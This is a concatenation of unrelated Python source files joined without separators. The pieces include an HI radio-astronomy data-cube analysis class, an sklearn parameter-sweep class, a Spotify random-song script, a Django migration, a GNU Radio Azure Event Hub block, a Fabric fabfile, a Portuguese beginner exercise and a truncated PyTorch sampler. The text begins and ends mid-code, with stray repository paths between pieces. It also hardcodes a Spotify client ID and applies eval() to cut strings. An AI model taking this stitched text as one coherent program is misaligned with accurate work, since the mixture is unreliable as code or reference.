bound,R0,V0,rotcurve) plt.axvline(vlsr, color='k') elif cutfile: cuts = np.load(cutfile) for cut in cuts: # make sure x-values are sorted idx = np.argsort(cut[0]) cut[1] = cut[1][idx] cut[0] = cut[0][idx] # plot at line position vlsr = np.interp(l, cut[0], cut[1],R0,V0,rotcurve) plt.axvline(vlsr, color='k') if plotFit: if self.fitres['available']: vel, vfit, PV, Tfit, aic = self.getFitResults(l, b, vmin, vmax) for klin in range(np.shape(PV)[1]): self.ax.plot(vel, PV[:, klin], color='g', linestyle='--') self.ax.plot(vel, Tfit, color='r') dev = np.sum(np.abs(Tb - Tfit)) / np.sum(Tb) print('AIC', aic) print('integrated fractional model deviation', dev) else: print("Fit results not available") if lineDtc: ilin, eps = epsDetect(Tb, lis=lis, lng=lng, sig=sig) ilin = np.array(ilin) eps = np.array(eps) ilin = ilin[eps > thresh] eps = eps[eps > thresh] for ii in range(len(ilin)): self.ax.plot(vel[ilin[ii]], eps[ii], marker='o', color='b', linewidth=0) if fitLine: fitres, model, ind_lines, vlin = self.mPSV_profile_fit(vel, Tb, lis=lis, lng=lng, thresh=thresh, sig=sig) self.ax.plot(vel, model, color='r', ) for n in range(len(ind_lines)): self.ax.plot(vel, ind_lines[n], color='g', linestyle='--') dev = np.sum(np.abs(Tb - model)) / np.sum(Tb) if (fitres['is_valid'] == True or \ (fitres['has_covariance'] == True and fitres[ 'has_valid_parameters'] == True and \ (fitres['has_reached_call_limit'] == False or fitres[ 'is_above_max_edm'] == False)) \ ) \ and dev < 1.: print('fit succeeded') else: print('fit failed') print(fitres) print('integrated fractional model deviation', dev) plt.show() def column(self, vel, Tb, Tbkg=2.66): # default Tbkg 2.66 K, CMB brightness temperature at 1.4GHz if self.Ts == -10.: intensity = self.int2col * np.sum(Tb) * np.abs( self.delta['velocity']) else: try: Tb[Tb > self.Ts - 5.] = self.Ts - 5. intensity = -self.int2col * np.abs( self.delta['velocity']) * self.Ts * np.sum( np.log(1 - Tb / (self.Ts - Tbkg))) except: intensity = -5000 intensity /= self.vscale return intensity def mapheader(self, hdu, lmax, bmin, bunit): # add the map keywords to the header hdu.header['CRPIX1'] = 1.0 hdu.header['CRVAL1'] = lmax hdu.header['CDELT1'] = -abs(self.delta['longitude']) hdu.header['CTYPE1'] = 'GLON-CAR' crpix_2 = self.coord2pix(0., 'latitude') - self.coord2pix(bmin, 'latitude') + 1 hdu.header['CRPIX2'] = crpix_2 hdu.header['CRVAL2'] = 0. 
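# Minimal sketch, illustrative only: column() above converts a 21 cm
# brightness-temperature profile into a column density. Optically thin:
# N(H) = C * sum(Tb) * |dv| with C ~ 1.823e18 cm^-2 (K km/s)^-1; with a finite
# spin temperature Ts it uses N(H) = -C * Ts * |dv| * sum(ln(1 - Tb/(Ts - Tbkg))),
# where Tbkg = 2.66 K is the CMB brightness temperature at 1.4 GHz. Assuming
# int2col plays the role of C; the helper name is hypothetical.
import numpy as np

def hi_column(tb, dv, ts=None, tbkg=2.66, c_factor=1.823E18):
    if ts is None:                      # optically thin approximation
        return c_factor * np.sum(tb) * abs(dv)
    tb = np.minimum(tb, ts - 5.0)       # keep the log argument positive
    return -c_factor * ts * abs(dv) * np.sum(np.log(1.0 - tb / (ts - tbkg)))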
hdu.header['CDELT2'] = abs(self.delta['latitude']) hdu.header['CTYPE2'] = 'GLAT-CAR' hdu.header['BUNIT'] = (bunit['unit'], bunit['quantity']) def commheader(self, hdu, comment): # add useful comments to the header hdu.header.add_comment(comment) def history(self, hdu, name, email): # add history cards hdu.header.add_history('map generated by {}, {}'.format(name, email)) hdu.header.add_history('on ' + time.ctime() + ' ' + time.tzname[1]) def lbmaps(self, lmin, lmax, bmin, bmax, vmin, vmax, names, vcuts=False, dcuts=False, cutfile = False, outdir='./', name_tag='', saveMaps=False, display=True, authname='', authemail='', useFit=False, dev_thresh=0.3): # check if required region is covered by input file, otherwise modify boundaries l1 = self.pix2coord(0, 'longitude') l2 = self.pix2coord(self.naxis['longitude'] - 1, 'longitude') ll = np.minimum(l1, l2) lu = np.maximum(l1, l2) lmin = np.maximum(lmin, ll) lmax = np.minimum(lmax, lu) b1 = self.pix2coord(0, 'latitude') b2 = self.pix2coord(self.naxis['latitude'] - 1, 'latitude') bl = np.minimum(b1, b2) bu = np.maximum(b1, b2) bmin = np.maximum(bmin, bl) bmax = np.minimum(bmax, bu) if vcuts == False and dcuts == False and cutfile == False: raise ValueError("Bounds for map generation not specified") else: lbins = int((lmax - lmin) / abs(self.delta['longitude'])) + 1 bbins = int((bmax - bmin) / abs(self.delta['latitude'])) + 1 ldir = self.delta['longitude'] / abs(self.delta['longitude']) bdir = self.delta['latitude'] / abs(self.delta['latitude']) F = plt.figure(1, (9, 8)) F.subplots_adjust(left=0.08, right=0.95, top=0.95, bottom=0.08) if vcuts: nn = len(vcuts) elif dcuts: nn = len(dcuts) + 1 elif cutfile: cuts = np.load(cutfile) nn = len(cuts) + 1 # make sure x-values are sorted for cut in cuts: idx = np.argsort(cut[0]) cut[1] = cut[1][idx] cut[0] = cut[0][idx] ngrid = int(np.ceil(np.sqrt(nn))) grid = AxesGrid(F, 111, nrows_ncols=(ngrid, ngrid), axes_pad=0.2, label_mode="L", share_all=True, cbar_location="top", cbar_mode="each", cbar_size="7%", cbar_pad="2%", ) extent = (lmax, lmin, bmin, bmax) vmaps = np.zeros([nn, bbins, lbins]) history = [] for ll in range(lbins): for bb in range(bbins): lpix = self.coord2pix(lmax, 'longitude') - ll * ldir bpix = self.coord2pix(bmin, 'latitude') + bb * bdir lon = self.pix2coord(lpix, 'longitude') lat = self.pix2coord(bpix, 'latitude') # if using distance cuts turn them in velocity if dcuts: vlsr = lbd2vlsr(lon, lat, np.array(dcuts),R0,V0,rotcurve) vlsr = np.append(vmin, vlsr) vlsr = np.append(vlsr, vmax) # if using a file build the velocity array for the l,b bin if cutfile: vlsr = np.array([]) vlsr = np.append(vlsr,vmin) for cut in cuts: vval = np.interp(lon,cut[0],cut[1]) vlsr = np.append(vlsr,vval) vlsr = np.append(vlsr, vmax) # retrieve data, and, in case fit vel, Tb = self.getLineData(lon, lat, vmin, vmax) if useFit: good_fit = False velf, vfit, PV, Tfit, aic = self.getFitResults(lon, lat, vmin, vmax) dev = np.sum(np.abs(Tb - Tfit)) / np.sum(Tb) if np.sum(np.abs(Tb)) == 0.: msg = 'lon {} lat {} NODATA'.format(lon, lat) history.append(msg) elif len(vfit) == 0: msg = 'lon {} lat {} fit FAILED'.format(lon, lat) history.append(msg) elif np.abs(dev) > dev_thresh: msg = 'lon {} lat {} fit BAD, integrated fractional model deviation {}'.format( lon, lat, dev) history.append(msg) else: good_fit = True msg = 'lon {} lat {} integrated fractional model deviation {}'.format( lon, lat, dev) history.append(msg) for s in range(nn): if vcuts: vrange = vcuts[s] vlow = eval(vrange[0]) vup = eval(vrange[1]) elif dcuts or cutfile: 
vlow = vlsr[s] vup = vlsr[s + 1] if useFit and good_fit: # add integral of all lines that have a peak in the velo range for klin, vlin in enumerate(vfit): if vlin >= vlow and vlin < vup: vmaps[s, bb, ll] += self.column(velf, PV[:, klin]) else: pass # correct for the residual colmn density correction = self.column(vel[(vel >= vlow) & (vel < vup)], Tb[(vel >= vlow) & (vel < vup)]) correction -= self.column(velf[(velf >= vlow) & (velf < vup)], Tfit[(velf >= vlow) & (velf < vup)]) vmaps[s, bb, ll] += correction else: vmaps[s, bb, ll] = self.column(vel[(vel >= vlow) & (vel < vup)], Tb[(vel >= vlow) & (vel < vup)]) # display and in case save maps if saveMaps: # history # takes a while to write in fits, dump separately histfile = gzip.open(outdir + 'lbmap_' + name_tag + 'history.txt.gz', 'wb') for k, line in enumerate(history): if not k == (len(history) - 1): histfile.write((line + '\n').encode()) histfile.close() for s in range(nn): im = grid[s].imshow(vmaps[s], extent=extent, interpolation='none', origin='lower', vmin=-5., cmap='Spectral_r') grid.cbar_axes[s].colorbar(im) t = add_inner_title(grid[s], names[s], loc=2) t.patch.set_ec("none") t.patch.set_alpha(0.5) if saveMaps: try: maphdu = fits.PrimaryHDU(vmaps[s]) lmax_out = self.pix2coord(self.coord2pix(lmax, 'longitude'), 'longitude') bmin_out = self.pix2coord(self.coord2pix(bmin, 'latitude'), 'latitude') bunit = {} if self.int2col == 1: bunit['unit'] = 'K km s-1' bunit['quantity'] = 'v-integrated Tb' else: bunit['unit'] = 'cm-2' bunit['quantity'] = 'N(H)' self.mapheader(maphdu, lmax_out, bmin_out, bunit) # comments if self.int2col != 1.: msg = 'Integral to column: {} cm-2 (K km s-1)-1'.format(self.int2col) self.commheader(maphdu, msg) if self.Ts != -10: self.commheader(maphdu, 'Spin temperature: {} K'.format(self.Ts)) if vcuts: self.commheader(maphdu, 'velocity cuts: ' + str(dcuts)) elif dcuts: self.commheader(maphdu, 'heliocentric distance cuts: ' + str(dcuts)) elif cutfile: self.commheader(maphdu, 'velocity cuts from file: ' + str(cutfile)) if useFit: self.commheader(maphdu, 'correction based on line profile fitting') self.commheader(maphdu, 'Map: n. 
{}, {}'.format(s, names[s])) self.history(maphdu, authname, authemail) maphdu.writeto(outdir + 'lbmap_' + name_tag + names[s] + '.fits') except: print("Saving map {} failed".format(s)) grid.axes_llc.set_xlabel('$l$ (deg)') grid.axes_llc.set_ylabel('$b$ (deg)') grid.axes_llc.set_xlim(lmax, lmin) grid.axes_llc.set_ylim(bmin, bmax) if display: plt.show() else: pass def vdiagram(self, lmin, lmax, bmin, bmax, vmin, vmax, integrate='latitude'): # convert boundaries into pixels imin = self.coord2pix(lmin, 'longitude') imax = self.coord2pix(lmax, 'longitude') jmin = self.coord2pix(bmin, 'latitude') jmax = self.coord2pix(bmax, 'latitude') kmin = self.coord2pix(vmin * self.vscale, 'velocity') kmax = self.coord2pix(vmax * self.vscale, 'velocity') # establish sense of increasing longitude and velocity ldir = self.delta['longitude'] / abs(self.delta['longitude']) vdir = self.delta['velocity'] / abs(self.delta['velocity']) # set boundaries according to axes order and orientation pixmin = [0, 0, 0] pixmax = [0, 0, 0] if ldir > 0: pixmin[self.atlas['longitude'] - 1] = imin pixmax[self.atlas['longitude'] - 1] = imax else: pixmin[self.atlas['longitude'] - 1] = imax pixmax[self.atlas['longitude'] - 1] = imin pixmin[self.atlas['latitude'] - 1] = jmin pixmax[self.atlas['latitude'] - 1] = jmax if vdir > 0: pixmin[self.atlas['velocity'] - 1] = kmin pixmax[self.atlas['velocity'] - 1] = kmax else: pixmin[self.atlas['velocity'] - 1] = kmax pixmax[self.atlas['velocity'] - 1] = kmin im = self.data[pixmin[2]:pixmax[2], pixmin[1]:pixmax[1], pixmin[0]:pixmax[0]] # if we integrate over latitude make sure longitude increases right to left if integrate == 'latitude' and ldir > 0: im = np.flip(im, axis=(3 - self.atlas['longitude'])) if vdir < 0: im = np.flip(im, axis=(3 - self.atlas['velocity'])) # always make sure velocity increases bottom to top # integrate over appropriate axis im = np.sum(im, axis=(3 - self.atlas[integrate])) # multiply by Delta to obtain K deg if integrate == 'latitude': im *= np.abs(self.delta['latitude']) elif integrate == 'longitude': im *= np.abs(self.delta['longitude']) # create the figure ax = plt.subplot(111) # reorder so that axes appear in the "right" place # and set figure extent and axis labels if integrate == 'latitude': if self.atlas['velocity'] < self.atlas['longitude']: im = im.transpose() extent = (lmax, lmin, vmin, vmax) ax.set_xlabel('$l$ (deg)') ax.set_ylabel('V (km s$^{-1}$)') elif integrate == 'longitude': if self.atlas['velocity'] > self.atlas['latitude']: im = im.transpose() extent = (vmin, vmax, bmin, bmax) ax.set_xlabel('V (km s$^{-1}$)') ax.set_ylabel('$b$ (deg)') # display the map plt.imshow(im, interpolation='none', origin='lower', extent=extent, aspect='auto', norm=LogNorm(vmin=2*np.abs(self.delta['latitude'])), cmap='jet') cbar = plt.colorbar(label="K deg") plt.show() def vdiagram_fit(self, lmin, lmax, bmin, bmax, vmin, vmax, integrate='latitude'): # check if required region is covered by input file, otherwise modify boundaries l1 = self.pix2coord(0, 'longitude') l2 = self.pix2coord(self.naxis['longitude'] - 1, 'longitude') ll = np.minimum(l1, l2) lu = np.maximum(l1, l2) lmin = np.maximum(lmin, ll) lmax = np.minimum(lmax, lu) b1 = self.pix2coord(0, 'latitude') b2 = self.pix2coord(self.naxis['latitude'] - 1, 'latitude') bl = np.minimum(b1, b2) bu = np.maximum(b1, b2) bmin = np.maximum(bmin, bl) bmax = np.minimum(bmax, bu) v1 = self.pix2coord(0, 'velocity')/self.vscale v2 = self.pix2coord(self.naxis['velocity'] - 1, 'velocity')/self.vscale vl = np.minimum(v1, v2) vu = 
np.maximum(v1, v2) vmin = np.maximum(vmin, vl) vmax = np.minimum(vmax, vu) # binning parameters lbins = int((lmax - lmin) / abs(self.delta['longitude'])) + 1 bbins = int((bmax - bmin) / abs(self.delta['latitude'])) + 1 vbins = int((vmax - vmin) / abs(self.delta['velocity']/self.vscale)) + 1 ldir = self.delta['longitude'] / abs(self.delta['longitude']) bdir = self.delta['latitude'] / abs(self.delta['latitude']) vdir = self.delta['velocity'] / abs(self.delta['velocity']) # create output array if integrate == 'latitude': im = np.zeros([vbins,lbins]) elif integrate == 'longitude': im = np.zeros([bbins, vbins]) for ll in range(lbins): print(ll,'of',lbins) for bb in range(bbins): lpix = self.coord2pix(lmax, 'longitude') - ll * ldir bpix = self.coord2pix(bmin, 'latitude') + bb * bdir lon = self.pix2coord(lpix, 'longitude') lat = self.pix2coord(bpix, 'latitude') velf, vfit, PV, Tfit, aic = self.getFitResults(lon, lat, vmin, vmax) for vv in range(vbins): vpix = self.coord2pix(self.vscale * vmin, 'velocity') + vv * vdir vel = self.pix2coord(vpix, 'velocity')/self.vscale for klin, vlin in enumerate(vfit): # check if line velocity falls within bin and that there is valid a fitted profile if np.abs(vlin - vel) <= np.abs(self.delta['velocity']/self.vscale) / 2 and \ klin < len(PV[0,:]): if integrate == 'latitude': im[vv,ll] += self.column(velf, PV[:, klin]) elif integrate == 'longitude': im[bb,vv] += self.column(velf, PV[:, klin]) else: pass print('done') # create the figure ax = plt.subplot(111) # and set figure extent and axis labels if integrate == 'latitude': extent = (lmax, lmin, vmin, vmax) ax.set_xlabel('$l$ (deg)') ax.set_ylabel('V (km s$^{-1}$)') if integrate == 'longitude': extent = (vmin, vmax, bmin, bmax) ax.set_xlabel('V (km s$^{-1}$)') ax.set_ylabel('$b$ (deg)') # display the map plt.imshow(im, interpolation='none', origin='lower', extent=extent, aspect='auto', norm=LogNorm(vmin=1), cmap='jet') cbar = plt.colorbar(label="N(H) 10^20 cm^-2") plt.show()import unittest # Wait until refactor here # from conduit.utils.datajoint_hook import * class TestDatajointHook(unittest.TestCase): def setUp(self): pass src/models/grid_sweep.py from itertools import product import numpy as np import pandas as pd from joblib import Parallel, delayed from sklearn.base import BaseEstimator from sklearn.model_selection import ParameterGrid class GridSweep(BaseEstimator): """Provides functionality for sweeping over parameters using sklearn-like estimators Parameters ---------- estimator : estimator object. This is assumed to implement the scikit-learn estimator interface. Either estimator needs to provide a ``score`` function, or ``scoring`` must be passed. param_grid : dict or list of dictionaries Dictionary with parameters names (string) as keys and lists of parameter settings to try as values, or a list of such dictionaries, in which case the grids spanned by each dictionary in the list are explored. This enables searching over any sequence of parameter settings. scoring : dict or None, default: None A dict with names as keys and callables as values. The callables should have the signature (``estimator``, ``X``, ``y``) and return a scalar value. If ``None``, the model's ``score`` method is called n_jobs : int or None, optional (default=None) Number of jobs to run in parallel. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary ` for more details. 
pre_dispatch : int, or string, optional Controls the number of jobs that get dispatched during parallel execution. Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A string, giving an expression as a function of n_jobs, as in '2*n_jobs' refit : boolean, string, or callable, default=True Refit an estimator using the best found parameters on the whole dataset. For multiple metric evaluation, this needs to be a string denoting the scorer that would be used to find the best parameters for refitting the estimator at the end. Where there are considerations other than maximum score in choosing a best estimator, ``refit`` can be set to a function which returns the selected ``best_index_`` given ``cv_results_``. The refitted estimator is made available at the ``best_estimator_`` attribute and permits using ``predict`` directly on this ``GridSearchCV`` instance. Also for multiple metric evaluation, the attributes ``best_index_``, ``best_score_`` and ``best_params_`` will only be available if ``refit`` is set and all of them will be determined w.r.t this specific scorer. ``best_score_`` is not returned if refit is callable. See ``scoring`` parameter to know more about multiple metric evaluation. verbose : integer Controls the verbosity: the higher, the more messages. n_init : int, optional (default=1) number of random initializations to try for each parameter set seed : int or RandomState random seed to use small_better : bool, optional, (default=True) whether small values of ``scoring`` functions are better than large values. 
Only matters when using ``refit`` Returns ------- [type] [description] """ def __init__( self, estimator, param_grid, scoring=None, n_jobs=1, refit=False, verbose=0, pre_dispatch="2*n_jobs", n_init=1, seed=None, small_better=True, ): # TODO input validation self.estimator = estimator self.param_grid = param_grid self.scoring = scoring self.n_jobs = n_jobs self.refit = refit self.verbose = verbose self.pre_dispatch = pre_dispatch self.n_init = n_init self.seed = seed self.small_better = small_better def fit(self, X, y=None): np.random.seed(self.seed) if not isinstance(self.param_grid, list): param_grid = list(ParameterGrid(self.param_grid)) estimator = self.estimator seeds = np.random.randint(1e8, size=self.n_init) def estimator_fit(params, seed): np.random.seed(seed) model = estimator(**params) model.fit(X, y=y) return model parallel = Parallel( n_jobs=self.n_jobs, verbose=self.verbose, pre_dispatch=self.pre_dispatch ) if self.verbose > 0: print("Fitting models...") models = parallel( delayed(estimator_fit)(p, s) for p, s in product(param_grid, seeds) ) scorers = self.scoring def estimator_score(model): scores = {} if scorers is not None: for name, scorer in scorers.items(): scores[name] = scorer(model, X, y=y) else: scores = {"score": model.score(X, y=y)} return scores if self.verbose > 0: print("Scoring models...") model_scores = parallel(delayed(estimator_score)(m) for m in models) result_df = pd.DataFrame(model_scores) self.result_df_ = result_df if self.refit is not False: if self.small_better: best_ind = result_df[self.refit].idxmin() else: best_ind = result_df[self.refit].idxmax() self.model_ = models[best_ind] return self import os import spotipy import sys import math import random import requests import json import base64 from datetime import datetime from spotipy.oauth2 import SpotifyClientCredentials class RandomSongGenerator: # Spotify API credentials CLIENT_ID = "8b9f85860db442c596871ea138aa4d60" CLIENT_SECRET = "" SPOTIFY_TOKEN_URL = "https://accounts.spotify.com/api/token" SPOTIFY_API_BASE_URL = "https://api.spotify.com" API_VERSION = "v1" SPOTIFY_API_URL = "{}/{}".format(SPOTIFY_API_BASE_URL, API_VERSION) def get_token(self): # Converts spotify api information into token client_token = base64.b64encode( "{}:{}".format(self.CLIENT_ID, self.CLIENT_SECRET).encode("UTF-8") ).decode("ascii") headers = {"Authorization": "Basic {}".format(client_token)} payload = {"grant_type": "client_credentials"} token_request = requests.post( self.SPOTIFY_TOKEN_URL, data=payload, headers=headers ) access_token = json.loads(token_request.text)["access_token"] return access_token def getRandomSong(self, access_token, genre=None): # Creates a random Spotify API hash random_wildcards = [ "%25a%25", "a%25", "%25a", "%25e%25", "e%25", "%25e", "%25i%25", "i%25", "%25i", "%25o%25", "o%25", "%25o", "%25u%25", "u%25", "%25u", ] wildcard = random.choice(random_wildcards) # Picks a random spotify song based on genre and hash authorization_header = {"Authorization": "Bearer {}".format(access_token)} song_request = requests.get( "{}/search?q={}{}&type=track&offset={}".format( self.SPOTIFY_API_URL, wildcard, "%20genre:%22{}%22".format(genre.replace(" ", "%20")), random.randint(0, 200), ), headers=authorization_header, ) song_info = random.choice(json.loads(song_request.text)["tracks"]["items"]) artist = song_info["artists"][0]["name"] song = song_info["name"] return "{} - {}".format(artist, song) test = RandomSongGenerator() token = test.get_token() for i in range(15): print(test.getRandomSong(token, 
"pop")) # Generated by Django 3.1.4 on 2021-03-06 18:07 from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('Main', '0034_auto_20210306_2058'), ] operations = [ migrations.RemoveField( model_name='product', name='a', ), migrations.AddField( model_name='productattribute', name='heart', field=models.ManyToManyField(blank=True, null=True, to=settings.AUTH_USER_MODEL), ), ] #!/usr/bin/env python # -*- coding: utf-8 -*- from gnuradio import gr from azure.eventhub import EventHubConsumerClient from azure.schemaregistry import SchemaRegistryClient from azure.schemaregistry.serializer.avroserializer import SchemaRegistryAvroSerializer from azure.identity import DefaultAzureCredential from eventhubs import models import threading import pmt schema_content = models.EventHubDataFrame.avro_schema() class eventhub_detect_source(gr.sync_block): def __init__(self,connection_str: str = None, endpoint: str = None, schema_group: str = None, eventhub_name: str = None, consumer_group: str = None, starting_position = None): gr.sync_block.__init__(self, name="eventhub_detect_source", in_sig=[], out_sig=[]) self.token_credential = DefaultAzureCredential() self.endpoint = endpoint self.schema_group = schema_group self.eventhub_connection_str = connection_str self.eventhub_name = eventhub_name self.consumer_group = consumer_group self.starting_position = starting_position self.schema_registry_client = SchemaRegistryClient(self.endpoint, self.token_credential) self.avro_serializer = SchemaRegistryAvroSerializer(self.schema_registry_client, self.schema_group) self.eventhub_consumer = EventHubConsumerClient.from_connection_string( conn_str=self.eventhub_connection_str, consumer_group=self.consumer_group, eventhub_name=self.eventhub_name) self.message_port_register_out(pmt.intern('out')) self.rxthread = threading.Thread(target=self.receive) self.rxthread.start() def receive(self): self.eventhub_consumer.receive(on_event=self.on_event, starting_position=self.starting_position) def on_event(self, partition_context, event): bytes_payload = b"".join(b for b in event.body) deserialized_data = self.avro_serializer.deserialize(bytes_payload) #print("packet n is %s" % deserialized_data['pkt_num']) if deserialized_data['zc_root'] != None and deserialized_data['channel_idx'] != None: a = pmt.make_dict() a = pmt.dict_add(a, pmt.string_to_symbol("zc_root"), pmt.from_long(deserialized_data['zc_root'])) a = pmt.dict_add(a, pmt.string_to_symbol("chan_idx"), pmt.from_long(deserialized_data['channel_idx'])) self.message_port_pub(pmt.intern("out"), a) def work(self, input_items, output_items): return 0 def stop(self): self.eventhub_consumer.close() self.rxthread.join() 1-10 from .core import types import random nQuiz = 1000 data = [] f = open(file="out.txt", mode='w') for i in range(nQuiz): # make quiz first = random.choice(range(1, 100000)) second = random.choice(range(1, 100000)) operator = random.choice(["+", "-", "*", "/", "%"]) # please flush property true print(first, operator, second, sep=" ", flush=True) # get python's answer pyAns = 0 if operator == "+": pyAns = first + second if operator == "-": pyAns = first - second if operator == "*": pyAns = first * second if operator == "/": pyAns = first / second if operator == "%": pyAns = first % second # get c++'s answer cppAns = input() # compare with table data.append([first, operator, second, pyAns, cppAns]) for i in range(nQuiz): first, 
operator, second, pyAns, cppAns = data[i][0], data[i][1], data[i][2], data[i][3], data[i][4]
    # flush=True so the comparison lines appear immediately
    print(str(first)+" "+operator+" "+str(second)+" = (python: "+str(pyAns)+", cpp: "+cppAns+")", flush=True)
    print(str(first)+" "+operator+" "+str(second)+" = (python: "+str(pyAns)+", cpp: "+cppAns+")", file=f)

import os
import platform
import re
import smpl.util as util
import smpl.exec as exec
import smpl.log_module as logger
from smpl.package import LibraryPackage
from smpl.config_file import ConfigObject, PackageParms


class Finalcut(LibraryPackage):
    def __init__(self, name, parms: PackageParms, cfg_obj: ConfigObject):
        super().__init__(name, cfg_obj)
        self.name = name
        self.parms = parms
        self.release = "v0.6.0"
        self.git_url = "https://github.com/gansm/finalcut.git"
        self.package_clone_dir_path = os.path.join(self.cfg_obj.clone_dir, "finalcut")
        self.git_branch_arg = "stable"
        self.package_stage_include_dir_path = os.path.join(self.cfg_obj.stage_dir, "include", "final")
        self.package_vendor_include_dir_path = os.path.join(self.cfg_obj.vendor_dir, "include", "final")

    def get_package(self):
        self.get_git_repo(self.git_url, "finalcut", self.git_branch_arg)

    def stage_package(self):
        util.clear_directory(self.package_stage_include_dir_path)
        util.rm_file("{}/libfinal*".format(self.stage_lib_dir_path))
        sys_desc = platform.platform()
        if re.search('Linux', sys_desc) is not None \
                and re.search('x86_64', sys_desc) is not None:
            arch_arg = "linux-x86_64"
        elif re.search('Darwin', sys_desc) is not None:
            arch_arg = "darwin64-x86_64-cc"
        else:
            raise RuntimeError("could not determine platform type for finalcut build options - platform is: {}".format(sys_desc))
        exec.run(["autoreconf", "--install", "--force"])
        exec.run(["./configure",
                  "--prefix={}".format(self.cfg_obj.stage_dir),
                  "--debug"
                  # arch_arg,
                  # "linux-x86_64"
                  # "darwin64-x86_64-cc"
                  ], self.package_clone_dir_versioned_path)
        exec.run(["make", "all"], self.package_clone_dir_versioned_path)
        exec.run(["make", "install"], self.package_clone_dir_versioned_path)

    def install_package(self):
        self.headers_from_stage_to_vendor("final", "final")
        self.libs_from_stage_to_vendor("libfinal.*")

# Lesson 18 - 03-12-2019
# Iterating over a list with for
# Using the for statement we iterate over a collection-type variable. Iterating means (simply put)
# walking through the whole variable and isolating its values.

# 1.1 Given the following tuple, use for to iterate over it and print (using an f-string)
# the beer's name, the beer's type, its IBU and its price.
cerveja = (('marca', 'tipo', 'ibu', 'preço'),
           ('Skol', 'IPA', 'ultra-leve', 3.50),
           ('Brahma', 'lager', 'leve/media', 3.45),
           ('Kaiser', 'Americam Larger', 'leve', 2.35),
           ('Sol', 'larger mão', 'agua', 1.19)
           )

cabe = cerveja[0]    # ('marca', 'tipo', 'ibu', 'preço')
dados = cerveja[1:]

# for dados_cerveja in dados:
#     for i in range(4):
#         print(f"{cabe[i]} {dados_cerveja[i]}")

# 1.2 Write a function that receives this tuple and returns a list of
# dictionaries, one referencing each of these beers.
def recebe(cerveja):
    cabe = cerveja[0]      # Split the header off the tuple
    dados = cerveja[1:]    # Split the data rows off the tuple
    lista_cerva = []       # Start a list to collect the results
    for dados_cerveja in dados:    # Loop over the data rows
        # Build the dictionary holding this row's data
        dicionario = {cabe[0]: dados_cerveja[0], cabe[1]: dados_cerveja[1],
                      cabe[2]: dados_cerveja[2], cabe[3]: dados_cerveja[3]}
        lista_cerva.append(dicionario)    # Append the dictionary to the list
    return lista_cerva    # Return the list to the caller
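# A more compact way to build the same list of dictionaries, shown here only as an
# illustrative sketch alongside the exercise above (recebe_zip is a name introduced
# for this example, not part of the original lesson): zip() pairs each header field
# with the matching value, and dict() turns those pairs into a dictionary.
def recebe_zip(cerveja):
    cabe = cerveja[0]
    return [dict(zip(cabe, linha)) for linha in cerveja[1:]]

# With the cerveja tuple defined above, recebe_zip(cerveja) returns the same list
# as recebe(cerveja).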
print(recebe(cerveja)) [ {'marca': 'Skol', 'tipo': 'IPA', 'ibu': 'ultra-leve', 'preço': 3.5}, {'marca': 'Brahma', 'tipo': 'lager', 'ibu': 'leve/media', 'preço': 3.45}, {'marca': 'Kaiser', 'tipo': 'Americam Larger', 'ibu': 'leve', 'preço': 2.35}, {'marca': 'Sol', 'tipo': 'larger mão', 'ibu': 'agua', 'preço': 1.19} ]6. Images/Load Digits Dataset from scikit-learn.py1-10 import originpro as op from sklearn.datasets import load_digits digits = load_digits() # load digit images, total 1797 images, each is 8x8 aa = digits.images.astype(dtype='uint8') iw = op.new_image() iw.setup(1, True) # set image window is gray scale, with multiple frames data = aa[0:10,:,:] iw.from_np(data, False) iw.set_int('GrayMax',16) #set to show only 17 colors (0-16) iw.set_int('nav', 3) # Show navigation bar as slider iw.set_str('Palette', 'Fire') zouzias/fabric from fabric.api import * env.hosts = ['host1', 'host2'] env.use_ssh_config = True def host_type(): run('uname -s') def apt_update(): sudo('apt-get update') def apt_upgrade(): sudo('apt-get -qy upgrade') def uptime(): run('uptime') def reboot(): sudo('reboot') # Used for the commandline flags. HEAD_CHOICES = ( 'direct', 'direct_normalize', 'fc1024', 'fc1024_normalize', 'fc1024_spatial_attention', 'fc1024_spatial_attention_softmax', 'fc1024_MBA_5b_addition', 'fc1024_MBA_5b_kl_addition', 'fc1024_MBA_5b_js_addition', 'fc1024_MBA_5b_concat', 'fc1024_MBA_5b_kl_concat', 'fc1024_MBA_5b_js_concat', 'fc1024_fixed_attention', 'fc1024_recurrent_attention', 'fc1024_recurrent_attention_wstop', 'fc1024_inception_spatial_attention', 'fc1024_inception_recurrent_attention', 'fc1024_inception_residual_attention_light', 'fc1024_inception_mixed_attention', 'fc1024_inception_multi-resolution_spatial_attention', 'fc1024_inception_multi-head_attention', 'fc1024_inception_multi-head_residual_attention', 'fc1024_inception_MBA_5b_addition', 'fc1024_inception_MBA_5b_multi_embs', 'fc1024_inception_MBA_5b_addition_linear', 'fc1024_inception_MBA_5b_addition_single_residual', 'fc1024_inception_MBA_5b_addition_joint', 'fc1024_inception_multi-residual-head_attention', 'fc1024_inception_multi-residual-head_attention_kl', 'fc1024_inception_multi-residual-head_attention_5_branch', 'fc1024_inception_multi-residual-head_attention_8_branch', 'fc1024_inception_multi-residual-head_attention_1e-2', 'fc1024_inception_min-max_spatial_attention', 'fc1024_inception_residual_attention_light_tanh', 'fc1024_residual_attention-heavy', 'fc1024_mixed_attention', 'fc1024_multi-resolution_spatial_attention', 'fc1024_multi-head_attention', 'global_pooling_inception_mixed_attention', 'fc1024_vgg_MBA_5b_addition', 'fc1024_vgg_MBA_5b_kl_addition', ) /home/runner/.cache/pip/pool/3f/10/5e/0da870cfd442c4b93168f62f7eb1f09417d637dc6c7f4acefd6341907esmall_scale/datasets.py import csv, torchvision, numpy as np, random, os from PIL import Image import numpy as np import copy from torch.utils.data import Sampler, Dataset, DataLoader, BatchSampler, SequentialSampler, RandomSampler, Subset from torchvision import transforms, datasets from collections import defaultdict class IdentityBatchSampler(Sampler): def __init__(self, dataset, batch_size, num_instances, num_iterations=None): self.dataset = dataset self.batch_size = batch_size self.num_instances = num_instances self.num_iterations = num_iterations def __iter__(self): indices = list(range(len(self.dataset))) random.shuffle(indices) for k in range(len(self)): offset = k*self.batch_size%len(indices) batch_indices 